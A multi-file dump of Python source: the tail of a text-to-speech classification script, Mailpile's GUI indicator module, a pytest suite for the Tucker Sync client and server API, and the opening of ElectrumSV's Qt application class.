subprocess.Popen(["aplay", "-D", "sysdefault"], stdin=espeak_process.stdout, stdout=subprocess.PIPE)
call (["sudo","rm","-rf","/dev/shm/teradeep.txt"]) #remove last run of classification info
os.remove(self.teratext)
def stop(self):
self.running = False
call (["sudo","killall","teradeep_opencv"]) #Kills Teradeep C++ loop
|
gui.py
|
import json
import os
import sys
import threading
import time
import webbrowser
import mailpile.auth
import mailpile.util
from mailpile.commands import Quit
from mailpile.i18n import gettext as _
from mailpile.safe_popen import Popen, PIPE, MakePopenSafe, MakePopenUnsafe
from mailpile.ui import Session
from mailpile.util import *
__GUI__ = None
def indicator(command, **kwargs):
__GUI__.stdin.write('%s %s\n' % (command, json.dumps(kwargs)))
def startup(config):
if sys.platform in ('darwin', ) or os.getenv('DISPLAY'):
th = threading.Thread(target=_real_startup, args=[config])
th.name = 'GUI'
th.daemon = True
th.start()
def output_eater(fd, buf):
for line in fd:
buf.append(line)
def _real_startup(config):
while config.http_worker is None:
time.sleep(0.1)
try:
session_id = config.http_worker.httpd.make_session_id(None)
mailpile.auth.SetLoggedIn(None, user='GUI plugin client',
session_id=session_id)
cookie = config.http_worker.httpd.session_cookie
sspec = config.http_worker.httpd.sspec
base_url = 'http://%s:%s' % sspec
script_dir = os.path.dirname(os.path.realpath(__file__))
script = os.path.join(script_dir, 'gui-o-matic.py')
global __GUI__
gui = __GUI__ = Popen(['python', '-u', script],
bufsize=1, # line buffered
stdin=PIPE, stderr=PIPE,
long_running=True)
stderr = []
eater = threading.Thread(target=output_eater,
args=[gui.stderr, stderr])
eater.name = 'GUI(stderr)'
eater.daemon = True
eater.start()
ico = lambda s: os.path.join(script_dir, 'icons-%(theme)s', s)
gui.stdin.write(json.dumps({
'app_name': 'Mailpile',
'indicator_icons': {
'startup': ico('startup.png'),
'normal': ico('normal.png'),
'working': ico('working.png'),
'attention': ico('attention.png'),
'shutdown': ico('shutdown.png')
},
'indicator_menu': [
{
'label': _('Starting up ...'),
'item': 'status'
},{
'label': _('Open Mailpile'),
'item': 'open',
'op': 'show_url',
'args': [base_url]
},{
'label': _('Quit'),
'item': 'quit',
'op': 'get_url',
'args': [base_url + '/api/0/quitquitquit/']
}
],
'http_cookies': {
base_url: [[cookie, session_id]]
},
}).strip() + '\nOK GO\n')
indicator('set_menu_sensitive', item='quit')
indicator('set_menu_sensitive', item='open')
# FIXME: This sleep is lame
time.sleep(5)
if (gui.poll() is not None) or mailpile.util.QUITTING:
return
except:
# If the basic indicator setup fails, we just assume it doesn't
# work and go silently dead...
return
quitting = False
try:
# ...however, getting this far means if the indicator dies, then
# the user tried to quit the app, so we should cooperate and die
# (via the except below).
while config.index is None or not config.tags:
if mailpile.util.QUITTING:
return
if gui.poll() is not None:
return
time.sleep(1)
indicator('set_status_normal')
# FIXME: We should do more with the indicator... this is a bit lame.
while True:
if mailpile.util.QUITTING:
quitting = True
indicator('set_status_shutdown')
indicator('set_menu_sensitive', item='open', sensitive=False)
indicator('set_menu_sensitive', item='quit', sensitive=False)
indicator('set_menu_label',
item='status',
label=_('Shutting down...'))
l = threading.Lock()
l.acquire()
l.acquire() # Deadlock, until app quits
else:
indicator('set_menu_label',
item='status',
label=_('%d messages') % len(config.index and
config.index.INDEX or []))
time.sleep(1)
except AttributeError:
pass
finally:
try:
if not quitting:
Quit(Session(config)).run()
except:
pass
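# For reference, indicator() writes one command per line to the gui-o-matic
# subprocess; for example
#
#     indicator('set_menu_label', item='status', label='Ready')
#
# produces the stdin line:
#
#     set_menu_label {"item": "status", "label": "Ready"}
#
# The 'Ready' label is illustrative; the command names used above come from
# this module.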
|
tests.py
|
#!env/bin/python
"""Tucker Sync test module.
Main test suite for the algorithm, server and client.
WARNING:
DATA LOSS!
Do not run tests against a production database with live data.
    All database tables will be dropped and then recreated after the tests run,
    leaving the database ready for production with fresh tables.
Remote server:
Functional and integration tests are designed to execute against a running
local or remote server. Since there is no RPC (remote procedure call) to
    drop-create all tables, and an open connection to a remote database is not
    expected, this module cannot clean the database of a remote server.
- Use the --remote-server test option.
- On the remote server clean the database with `app_setup.py --only-tables`
Unit tests require direct access to the local modules and database
precluding their use in testing remote installations.
Usage:
tests.py [-h] [--remote-server] [--baseurl BASEURL] [-k K]
Optional arguments:
-h, --help show this help message and exit
--remote-server use when running against a remote server
--baseurl BASEURL specify the server base url
-k K only run tests which match the given substring expression
Usage examples:
./tests.py
./tests.py --help
./tests.py --baseurl "http://0.0.0.0:8080/"
./tests.py -k "TestIntegration or TestMultiple"
./tests.py --baseurl "http://0.0.0.0:8080/" -k "TestServer and not sync"
License:
The MIT License (MIT), see LICENSE.txt for more details.
Copyright:
Copyright (c) 2014 Steven Tucker and Gavin Kromhout.
"""
import argparse
import pytest
import requests
import uuid
from flexmock import flexmock
from requests.exceptions import ConnectionError
from werkzeug.exceptions import MethodNotAllowed, NotImplemented, BadRequest
import client
import server
import app_model
from common import APIRequestType, HTTP, JSON, APIRequest, APIErrorResponse, \
JSONKey, APIErrorCode, SyncDownRequestBody, AccountOpenRequestBody, \
SyncUpRequestBody, SyncCount
from app_config import APP_KEYS
fixture = pytest.fixture
parametrize = pytest.mark.parametrize
use_fixtures = pytest.mark.usefixtures
yield_fixture = pytest.yield_fixture
class TestCommon(object):
"""Common unit tests."""
def test_api_error_response(self):
assert '{"error":0}' == APIErrorResponse.SUCCESS
assert '{"error":1}' == APIErrorResponse.INTERNAL_SERVER_ERROR
assert '{"error":2}' == APIErrorResponse.MALFORMED_REQUEST
@use_fixtures('session_fin_drop_create_tables')
class TestServerUnit(object):
"""Server unit tests.
Running server not required for unit tests.
    However, a connection to a running database is required."""
@yield_fixture
def holder(self):
holder = server.Holder()
holder.response = server.Response()
holder.cursor, holder.cnx, errno = server.open_db()
assert not errno
holder.object_class = app_model.Product
yield holder
# finalization
server.close_db(holder.cursor, holder.cnx)
@use_fixtures('before_test_drop_create_tables')
def test_warn_expired_sessions_committed(self, holder, caplog):
"""Test logged warning when expired sessions are committed."""
from test_sync_count import insert_expired_and_current_sessions
insert_expired_and_current_sessions()
server.mark_expired_sessions_committed(holder)
logged_msg = SyncCount.WARN_EXPIRED_SESSIONS_COMMITTED % 4
assert logged_msg in caplog.text()
count = 0
for record in caplog.records():
if record.getMessage() == logged_msg:
assert 'WARNING' == record.levelname
count += 1
assert 1 == count
@use_fixtures("session_fin_drop_create_tables")
class TestServer(object):
"""Server functional tests.
base_url is a test fixture defined in conftest.py
"""
@fixture(scope='class')
def account_open_request_body(self):
rb = AccountOpenRequestBody()
rb.clientUUID = uuid.uuid4()
return rb
@fixture(scope='class')
def sync_down_request_body(self, account_open_request_body):
rb = SyncDownRequestBody()
rb.objectClass = 'Product'
rb.clientUUID = account_open_request_body.clientUUID
rb.lastSync = 0
return rb
@fixture(scope='class')
def sync_up_request_body(self, account_open_request_body):
rb = SyncUpRequestBody()
rb.objectClass = 'Product'
rb.clientUUID = account_open_request_body.clientUUID
rb.objects = []
return rb
@fixture
def req(self, base_url):
req = APIRequest()
req.base_url = base_url
req.type = APIRequestType.TEST
req.key = APP_KEYS[1]
req.email = 'user@example.com'
req.password = 'secret78901234'
return req
METHODS_NOT_ALLOWED = ('', ' ',
'*', '%', '$', '&', '@',
'None', 'none', 'NONE',
'Null', 'null', 'NULL',
'OPTIONS', 'GET', 'HEAD', 'PUT',
'PATCH', 'DELETE', 'TRACE', 'CONNECT')
@parametrize('method', METHODS_NOT_ALLOWED)
def test_method_not_allowed(self, req, method):
"""Test server base url for method not allowed responses."""
def assert_method_not_allowed():
assert MethodNotAllowed.code == response.status_code
if method != 'TRACE':
assert 'POST' == response.headers.get('Allow')
if method != 'HEAD':
assert 'Method Not Allowed' in response.content
try:
response = requests.request(method, req.base_url,
headers=req.base_headers)
except ConnectionError:
# For some of the methods PHP CLI may get no further than this.
pytest.xfail('PHP CLI server incorrectly aborts connection.')
assert False
if method in ('', ' '):
if 'Apache' in response.headers.get('Server', []):
# Apache responds correctly.
assert_method_not_allowed()
else:
# Python server (Werkzeug run_simple)
# only returns HTTP/0.9 - body of a 400 Bad Request.
mna = '405' in response.content
bad = '400' in response.content
assert mna or bad
return
if method in ('None', 'none', 'NONE',
'Null', 'null', 'NULL',
'CONNECT'):
assert response.status_code in (MethodNotAllowed.code,
NotImplemented.code,
BadRequest.code)
            if response.status_code == MethodNotAllowed.code:
assert_method_not_allowed()
return
# All remaining methods.
assert_method_not_allowed()
def test_connection(self, req):
"""Test server 'test' function.
Auth should fail due to no account on server."""
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code # connection ok.
assert APIErrorResponse.AUTH_FAIL == response.content
def test_account_open(self, req, account_open_request_body):
"""Test server 'accountOpen' function."""
req.type = APIRequestType.ACCOUNT_OPEN
req.body = JSON.dumps(account_open_request_body.to_primitive())
response = requests.post(req.base_url, req.body,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.SUCCESS == response.content
def test_authentication(self, req):
"""Test server 'test' function.
Auth should pass."""
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.SUCCESS == response.content
def test_account_open_email_not_unique(self, req):
"""Test server 'accountOpen' function.
Existing client email (created above)."""
req.type = APIRequestType.ACCOUNT_OPEN
account_open_request_body = AccountOpenRequestBody()
account_open_request_body.clientUUID = uuid.uuid4() # unique uuid
req.body = JSON.dumps(account_open_request_body.to_primitive())
response = requests.post(req.base_url, req.body,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.EMAIL_NOT_UNIQUE == response.content
def test_account_open_uuid_not_unique(self, req,
account_open_request_body):
"""Test server 'accountOpen' function.
Existing client UUID (created above)."""
req.type = APIRequestType.ACCOUNT_OPEN
req.email = 'user2@example.com'
req.body = JSON.dumps(account_open_request_body.to_primitive())
response = requests.post(req.base_url, req.body,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.CLIENT_UUID_NOT_UNIQUE == response.content
def test_authentication_invalid_password_too_short(self, req):
"""Test server 'test' function.
Short invalid password. Auth simply fails don't leak why."""
req.password = 'short'
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.AUTH_FAIL == response.content
INVALID_KEYS = ('', ' ', 'notPrivate',
'*', '%', '$', '&', '@',
'None', 'none', 'NONE',
'Null', 'null', 'NULL')
@parametrize('key', INVALID_KEYS)
def test_invalid_key(self, req, key):
"""Test server 'test' function with an invalid key."""
req.key = key
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.INVALID_KEY == response.content
def test_sync_down(self, req, sync_down_request_body):
"""Test server 'syncDown' function."""
req.type = APIRequestType.SYNC_DOWN
req.body = JSON.dumps(sync_down_request_body.to_primitive())
response = requests.post(req.base_url, req.body,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
jo = response.json()
assert APIErrorCode.SUCCESS == jo[JSONKey.ERROR]
assert isinstance(jo[JSONKey.OBJECTS], list)
def test_sync_down_without_content_header(self, req):
"""Test server 'syncDown' function."""
req.type = APIRequestType.SYNC_DOWN
response = requests.post(req.base_url,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.MALFORMED_REQUEST == response.content
def test_sync_up(self, req, sync_up_request_body):
"""Test server 'syncUp' function."""
req.type = APIRequestType.SYNC_UP
req.body = JSON.dumps(sync_up_request_body.to_primitive())
response = requests.post(req.base_url, req.body,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
jo = response.json()
assert APIErrorCode.SUCCESS == jo[JSONKey.ERROR]
assert isinstance(jo[JSONKey.OBJECTS], list)
def test_sync_up_without_content_header(self, req):
"""Test server 'syncUp' function."""
req.type = APIRequestType.SYNC_UP
response = requests.post(req.base_url,
params=req.params, headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.MALFORMED_REQUEST == response.content
def test_authentication_email_not_specified(self, req):
"""Test server 'test' function with no email query param."""
req.email = None
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.AUTH_FAIL == response.content
def test_malformed_request_key_not_specified(self, req):
"""Test server 'test' function with no key query param."""
req.key = None
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.MALFORMED_REQUEST == response.content
def test_malformed_request_type_not_specified(self, req):
"""Test server when no request type is specified."""
req.type = None
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.MALFORMED_REQUEST == response.content
UNSUPPORTED_REQ_TYPE = ('', ' ', 'notSupported',
'*', '%', '$', '&', '@',
'None', 'none', 'NONE',
'Null', 'null', 'NULL')
@parametrize('req_type', UNSUPPORTED_REQ_TYPE)
def test_malformed_request_type_not_supported(self, req, req_type):
"""Test server when an unsupported request type is specified."""
req.type = req_type
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.MALFORMED_REQUEST == response.content
def test_account_close(self, req):
"""Test server 'accountClose' function."""
req.type = APIRequestType.ACCOUNT_CLOSE
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.SUCCESS == response.content
def test_authentication_closed_account(self, req):
"""Test server 'test' function. Auth should fail."""
response = requests.post(req.base_url, params=req.params,
headers=req.headers)
assert HTTP.OK == response.status_code
assert APIErrorResponse.AUTH_FAIL == response.content
@use_fixtures("session_fin_drop_create_tables")
class TestClient(object):
"""Client unit tests."""
@fixture(scope="class")
def client_a(self, base_url):
return client.Client(base_url, APP_KEYS[1],
'user@example.com', 'secret78901234')
@fixture(scope="class")
def client_b(self, base_url):
return client.Client(base_url, APP_KEYS[0],
'user@example.com', 'secret78901234')
@fixture(scope="function")
def mock_response(self):
return flexmock(status_code=200, content='{"error":0}')
def test_instantiate_client_a(self, client_a):
assert client_a
def test_instantiate_client_b(self, client_b):
assert client_b
def test_uuid_isinstance_of_uuid(self, client_a):
assert isinstance(client_a.UUID, uuid.UUID)
def test_uuid_is_unique(self, client_a, client_b):
assert client_a.UUID != client_b.UUID
def test_get_json(self, client_a, mock_response):
jo = client_a.get_json_object(mock_response)
assert mock_response.content == JSON.dumps(jo)
def test_get_json_non_ok_status_code(self, client_a, mock_response):
mock_response.status_code = 401
with pytest.raises(Exception):
client_a.get_json_object(mock_response)
BAD_CONTENT = ('', ' ', '*', '[]', '{}',
'None', 'none', 'NONE',
'Null', 'null', 'NULL',
'{"error":}', '{"objects":[]}')
@parametrize('content', BAD_CONTENT)
def test_get_json_bad_content(self, client_a,
mock_response, content):
mock_response.content = content
with pytest.raises(Exception):
client_a.get_json_object(mock_response)
@use_fixtures("session_fin_drop_create_tables")
class TestIntegration(object):
"""Test the API by exercising the client and server."""
@fixture(scope="class")
def client_a(self, base_url):
return client.Client(base_url,
APP_KEYS[1],
str(uuid.uuid4()) + '@example.com',
'secret78901234')
@fixture(scope="class")
def client_b(self, base_url):
return client.Client(base_url,
APP_KEYS[0],
str(uuid.uuid4()) + '@example.com',
'secret78901234')
def test_connection_a(self, client_a):
"""Test client_a's connection to server."""
result = client_a.check_connection()
assert True == result
def test_connection_b(self, client_b):
"""Test client_b's connection to server."""
result = client_b.check_connection()
assert True == result
def test_account_open(self, client_a):
"""Test opening an account."""
result = client_a.account_open()
assert True == result
def test_account_authentication(self, client_a):
"""Test authentication of the account created above."""
result = client_a.check_authentication()
assert True == result
def test_account_authentication_wrong_password(self, client_a):
"""Test authentication of the account created above.
Wrong password."""
saved_password = client_a.password
client_a.password = 'secret789012345' # set wrong password
result = client_a.check_authentication()
client_a.password = saved_password
assert False == result
def test_account_open_email_not_unique(self, client_a):
"""Test opening an account with the same email as above."""
result = client_a.account_open()
assert False == result
def test_account_open_invalid_password_too_short(self, client_b):
"""Test opening an account with a password that is too short."""
saved_password = client_b.password
client_b.password = 'secret7890123' # set short password
result = client_b.account_open()
client_b.password = saved_password
assert False == result
def test_account_open_invalid_email_syntax(self, client_b):
"""Test opening an account with an invalid email syntax."""
saved_email = client_b.email
client_b.email = str(uuid.uuid4()) + 'example.com' # missing '@'
result = client_b.account_open()
client_b.email = saved_email
assert False == result
def test_account_modify_password(self, client_a):
"""Test modifying the account password created by client_a."""
new_password = 'secret78901235'
result = client_a.account_modify(client_a.email, new_password)
client_a.password = new_password
assert True == result
def test_account_authentication_changed_password(self, client_a):
"""Test authentication of the account modified above."""
result = client_a.check_authentication()
assert True == result
def test_account_modify_email(self, client_a):
"""Test modifying the account email created by client_a."""
new_email = str(uuid.uuid4()) + '@example.com'
result = client_a.account_modify(new_email, client_a.password)
client_a.email = new_email
assert True == result
def test_account_authentication_changed_email(self, client_a):
"""Test authentication of the account modified above."""
result = client_a.check_authentication()
assert True == result
def test_account_modify_password_and_email(self, client_a):
"""Test modifying the account created by client_a."""
new_password = 'secret78901236'
new_email = str(uuid.uuid4()) + '@example.com'
result = client_a.account_modify(new_email, new_password)
client_a.password = new_password
client_a.email = new_email
assert True == result
def test_account_authentication_changed_password_and_email(self, client_a):
"""Test authentication of the account modified above."""
result = client_a.check_authentication()
assert True == result
def test_account_modify_wrong_password(self, client_a):
"""Test modify of the account created above with wrong password."""
new_password = 'secret78901238'
new_email = str(uuid.uuid4()) + '@example.com'
saved_password = client_a.password
client_a.password = 'secret78901237' # set wrong password
result = client_a.account_modify(new_email, new_password)
client_a.password = saved_password
assert False == result
def test_account_authentication_unchanged_password_and_email(self,
client_a):
"""Test authentication of the unchanged account above."""
result = client_a.check_authentication()
assert True == result
def test_account_modify_email_with_no_account(self, client_b):
"""Test modifying an account.
Email that does not have an account."""
result = client_b.account_modify(client_b.email, client_b.password)
assert False == result
def test_account_close_wrong_password(self, client_a):
"""Test closing of the account created by client_a.
Wrong password."""
saved_password = client_a.password
client_a.password = 'secret78901237' # set wrong password
result = client_a.account_close()
client_a.password = saved_password
assert False == result
def test_account_authentication_unclosed_account(self, client_a):
"""Test authentication of the unclosed account above."""
result = client_a.check_authentication()
assert True == result
def test_account_close(self, client_a):
"""Test closing an account."""
result = client_a.account_close()
assert True == result
def test_account_authentication_closed_account(self, client_a):
"""Test authentication of the account closed above."""
result = client_a.check_authentication()
assert False == result
@use_fixtures("session_fin_drop_create_tables")
class TestMultipleClientIntegration(object):
"""Test the API by exercising multiple clients and server."""
@fixture(scope="class")
def client_a(self, base_url):
return client.Client(base_url, APP_KEYS[1],
'user@example.com', 'secret78901234')
@fixture(scope="class")
def client_b(self, base_url):
return client.Client(base_url, APP_KEYS[0],
'user@example.com', 'secret78901234')
def test_connection_with_sequential_clients(self, client_a, client_b):
for x in xrange(8):
r1 = client_a.check_connection()
r2 = client_b.check_connection()
assert True == r1
assert True == r2
def test_connection_with_parallel_clients(self, client_a, base_url):
"""Parallel clients.
Client A is run in the test process while client C is run in another
process. This allows genuine parallel execution of the client module
code in Python. Connections to the server are effectively a race
condition for each client."""
from multiprocessing import Process, Queue
def run_client_a():
short_uuid = str(client_a.UUID)[:6]
for x in xrange(8):
print 'client a, short UUID:', short_uuid
r1 = client_a.check_connection()
assert True == r1
def run_client_c(q, url):
r = True
client_c = client.Client(url, APP_KEYS[1],
'user@example.com', 'secret78901234')
short_uuid = str(client_c.UUID)[:6]
for x in xrange(8):
print 'client c, short UUID:', short_uuid
if client_c.check_connection() is False:
r = False
q.put(r)
queue = Queue()
Process(target=run_client_c, args=(queue, base_url)).start()
run_client_a()
client_c_result = queue.get()
assert True == client_c_result
def get_cmd_args():
"""Get the command line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument("--remote-server", action='store_true',
help="use when running against a remote server")
parser.add_argument("--baseurl", help="specify the server base url")
parser.add_argument("-k",
help="only run tests matching the given substring "
"expression")
return parser.parse_args()
def get_pytest_args(file_name, cmd_args):
"""Build and return the pytest arguments."""
# PyTest argument list: verbose, exit on first failure and caplog format.
args = ['-vx', '--log-format=%(levelname)s:%(name)s:%(message)s']
if cmd_args.remote_server:
args.append('--remote-server')
# Optional command line argument specifying the server base url.
if cmd_args.baseurl:
args.append('--baseurl')
args.append(cmd_args.baseurl)
# Specify this file as the only test file.
args.append(file_name)
# Optional command line argument to only run tests matching the given
# substring expression.
if cmd_args.k:
args.append('-k %s' % cmd_args.k)
return args
def main(file_name):
"""Run the test suite."""
cmd_args = get_cmd_args()
args = get_pytest_args(file_name, cmd_args)
# Run PyTest with the supplied args.
# Equivalent to PyTest command line:
# env/bin/py.test -vx --log-format="%(levelname)s:%(name)s:%(message)s"
# --baseurl "http://0.0.0.0:8080/" tests.py -k "TestServer"
pytest.main(args)
# Run main when commands read either from standard input,
# from a script file, or from an interactive prompt.
if __name__ == "__main__":
main(__file__)
|
app.py
|
# ElectrumSV - lightweight Bitcoin client
# Copyright (C) 2019-2020 The ElectrumSV Developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''ElectrumSV application.'''
import concurrent.futures
import datetime
import os
from functools import partial
import signal
import sys
import threading
from typing import Any, Callable, cast, Coroutine, Iterable, List, Optional, TypeVar
from aiorpcx import run_in_thread
import PyQt5.QtCore as QtCore
from PyQt5.QtCore import pyqtSignal, QEvent, QObject, QTimer
from PyQt5.QtGui import QFileOpenEvent, QGuiApplication, QIcon
from PyQt5.QtWidgets import QApplication, QSystemTrayIcon, QMenu, QWidget, QDialog
from electrumsv.app_state import app_state, ExceptionHandlerABC
from electrumsv.contacts import ContactEntry, ContactIdentity
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.types import ExceptionInfoType
from electrumsv.util import UpdateCheckResultType
from electrumsv.wallet import AbstractAccount, Wallet
from . import dialogs, network_dialog
from .cosigner_pool import CosignerPool
from .main_window import ElectrumWindow
from .exception_window import Exception_Hook
from .label_sync import LabelSync
from .log_window import SVLogWindow, SVLogHandler
from .util import ColorScheme, get_default_language, MessageBox, read_QIcon
from .wallet_wizard import WalletWizard
T1 = TypeVar("T1")
logger = logs.get_logger('app')
class OpenFileEventFilter(QObject):
def __init__(self, windows: List[ElectrumWindow]) -> None:
super().__init__()
self.windows = windows
def eventFilter(self, obj: QObject, event: QEvent) -> bool:
if event.type() == QtCore.QEvent.Type.FileOpen:
if len(self.windows) >= 1:
self.windows[0].pay_to_URI(cast(QFileOpenEvent, event).url().toString())
return True
return False
class SVApplication(QApplication):
# Signals need to be on a QObject
create_new_window_signal = pyqtSignal(object, object, bool)
cosigner_received_signal = pyqtSignal(object, object)
labels_changed_signal = pyqtSignal(object, object, object)
window_opened_signal = pyqtSignal(object)
window_closed_signal = pyqtSignal(object)
# Async tasks
async_tasks_done = pyqtSignal()
# Logging
new_category = pyqtSignal(str)
new_log = pyqtSignal(object)
# Preferences updates
fiat_ccy_changed = pyqtSignal()
custom_fee_changed = pyqtSignal()
op_return_enabled_changed = pyqtSignal()
num_zeros_changed = pyqtSignal()
base_unit_changed = pyqtSignal()
fiat_history_changed = pyqtSignal()
fiat_balance_changed = pyqtSignal()
update_check_signal = pyqtSignal(bool, object)
# Contact events
contact_added_signal = pyqtSignal(object, object)
contact_removed_signal = pyqtSignal(object)
identity_added_signal = pyqtSignal(object, object)
identity_removed_signal = pyqtSignal(object, object)
def __init__(self, argv: List[str]) -> None:
QtCore.QCoreApplication.setAttribute(QtCore.Qt.ApplicationAttribute.AA_X11InitThreads)
if hasattr(QtCore.Qt, "AA_ShareOpenGLContexts"):
QtCore.QCoreApplication.setAttribute(
QtCore.Qt.ApplicationAttribute.AA_ShareOpenGLContexts)
if hasattr(QGuiApplication, 'setDesktopFileName'):
QGuiApplication.setDesktopFileName('electrum-sv.desktop')
super().__init__(argv)
self.windows: List[ElectrumWindow] = []
self.log_handler = SVLogHandler()
self.log_window: Optional[SVLogWindow] = None
self.net_dialog: Optional[network_dialog.NetworkDialog] = None
self.timer = QTimer(self)
self.exception_hook: Optional[ExceptionHandlerABC] = None
# A floating point number, e.g. 129.1
self.dpi = self.primaryScreen().physicalDotsPerInch()
# init tray
self.dark_icon = app_state.config.get("dark_icon", False)
self.tray = QSystemTrayIcon(self._tray_icon(), None)
self.tray.setToolTip('ElectrumSV')
self.tray.activated.connect(self._tray_activated)
self._build_tray_menu()
self.tray.show()
# FIXME Fix what.. what needs to be fixed here?
app_state.config.get('language', get_default_language())
logs.add_handler(self.log_handler)
self._start()
def _start(self) -> None:
self.setWindowIcon(read_QIcon("electrum-sv.png"))
self.installEventFilter(OpenFileEventFilter(self.windows))
self.create_new_window_signal.connect(self.start_new_window)
self.async_tasks_done.connect(app_state.async_.run_pending_callbacks)
self.num_zeros_changed.connect(partial(self._signal_all, 'on_num_zeros_changed'))
self.fiat_ccy_changed.connect(partial(self._signal_all, 'on_fiat_ccy_changed'))
self.base_unit_changed.connect(partial(self._signal_all, 'on_base_unit_changed'))
self.fiat_history_changed.connect(partial(self._signal_all, 'on_fiat_history_changed'))
# Toggling of showing addresses in the fiat preferences.
self.fiat_balance_changed.connect(partial(self._signal_all, 'on_fiat_balance_changed'))
self.update_check_signal.connect(partial(self._signal_all, 'on_update_check'))
ColorScheme.update_from_widget(QWidget())
def _signal_all(self, method: str, *args: str) -> None:
for window in self.windows:
getattr(window, method)(*args)
def _close(self) -> None:
for window in self.windows:
window.close()
def close_window(self, window: ElectrumWindow) -> None:
# NOTE: `ElectrumWindow` removes references to itself while it is closing. This creates
        # a problem where it gets garbage collected before its Qt5 `closeEvent` handling is
# completed and on Linux/MacOS it segmentation faults. On Windows, it is fine.
QTimer.singleShot(0, partial(self._close_window, window))
logger.debug("app.close_window.queued")
def _close_window(self, window: ElectrumWindow) -> None:
logger.debug(f"app.close_window.executing {window!r}")
app_state.daemon.stop_wallet_at_path(window._wallet.get_storage_path())
self.windows.remove(window)
self.window_closed_signal.emit(window)
self._build_tray_menu()
if not self.windows:
self._last_window_closed()
def setup_app(self) -> None:
# app_state.daemon is initialised after app. Setup things dependent on daemon here.
pass
def _build_tray_menu(self) -> None:
# Avoid immediate GC of old menu when window closed via its action
if self.tray.contextMenu() is None:
m = QMenu()
self.tray.setContextMenu(m)
else:
m = self.tray.contextMenu()
m.clear()
for window in self.windows:
submenu = m.addMenu(window._wallet.name())
submenu.addAction(_("Show/Hide"), window.show_or_hide)
# NOTE(typing) Need to pretend things that Qt uses return nothing.
submenu.addAction(_("Close"), cast(Callable[..., None], window.close))
m.addAction(_("Dark/Light"), self._toggle_tray_icon)
m.addSeparator()
m.addAction(_("Exit ElectrumSV"), self._close)
self.tray.setContextMenu(m)
def _tray_icon(self) -> QIcon:
if self.dark_icon:
return read_QIcon('electrumsv_dark_icon.png')
else:
return read_QIcon('electrumsv_light_icon.png')
def _toggle_tray_icon(self) -> None:
self.dark_icon = not self.dark_icon
app_state.config.set_key("dark_icon", self.dark_icon, True)
self.tray.setIcon(self._tray_icon())
def _tray_activated(self, reason: QSystemTrayIcon.ActivationReason) -> None:
if reason == QSystemTrayIcon.ActivationReason.DoubleClick:
if all([w.is_hidden() for w in self.windows]):
for w in self.windows:
w.bring_to_top()
else:
for w in self.windows:
w.hide()
def new_window(self, path: Optional[str], uri: Optional[str]=None) -> None:
# Use a signal as can be called from daemon thread
self.create_new_window_signal.emit(path, uri, False)
def show_network_dialog(self, parent: ElectrumWindow) -> None:
if not app_state.daemon.network:
parent.show_warning(_('You are using ElectrumSV in offline mode; restart '
'ElectrumSV if you want to get connected'), title=_('Offline'))
return
if self.net_dialog:
self.net_dialog._event_network_updated()
self.net_dialog.show()
self.net_dialog.raise_()
return
# from importlib import reload
# reload(network_dialog)
network = app_state.daemon.network
assert network is not None
self.net_dialog = network_dialog.NetworkDialog(network)
self.net_dialog.show()
def show_log_viewer(self) -> None:
if self.log_window is None:
self.log_window = SVLogWindow(None, self.log_handler)
self.log_window.show()
def _last_window_closed(self) -> None:
for dialog in (self.net_dialog, self.log_window):
if dialog:
dialog.accept()
def on_transaction_label_change(self, account: AbstractAccount, tx_hash: bytes, text: str) \
-> None:
self.label_sync.set_transaction_label(account, tx_hash, text)
def on_keyinstance_label_change(self, account: AbstractAccount, key_id: int, text: str) -> None:
self.label_sync.set_keyinstance_label(account, key_id, text)
def _create_window_for_wallet(self, wallet: Wallet) -> ElectrumWindow:
w = ElectrumWindow(wallet)
self.windows.append(w)
self._build_tray_menu()
self._register_wallet_events(wallet)
self.window_opened_signal.emit(w)
return w
def _register_wallet_events(self, wallet: Wallet) -> None:
# NOTE(typing) Some typing nonsense about not being able to assign to a method.
wallet.contacts._on_contact_added = self._on_contact_added # type: ignore[assignment]
wallet.contacts._on_contact_removed = self._on_contact_removed # type: ignore[assignment]
